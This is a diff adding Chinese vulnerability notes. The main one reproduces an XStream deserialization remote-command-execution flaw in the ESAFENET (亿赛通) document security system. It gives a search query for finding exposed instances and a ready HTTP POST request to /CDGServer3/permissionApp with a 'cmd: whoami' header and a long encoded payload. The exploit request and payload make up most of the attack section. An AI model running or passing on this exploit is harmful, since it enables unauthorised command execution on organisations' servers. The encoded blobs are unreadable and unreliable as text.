HDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706614611171-5819f3fa-4837-4780-82aa-2adb5d6f4816.png](./img/9ub3M2YstuwfNIbt/1706614611171-5819f3fa-4837-4780-82aa-2adb5d6f4816-179517.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yd77d4ck7exegl1x>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统permissionApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统permissionApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..6ea2c19
--- /dev/null
+++ b/亿赛通电子文档安全管理系统permissionApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统permissionApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统permissionApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/FWq4b7eTAr1EZ3xC/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-609715.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/permissionApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.31.208:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANN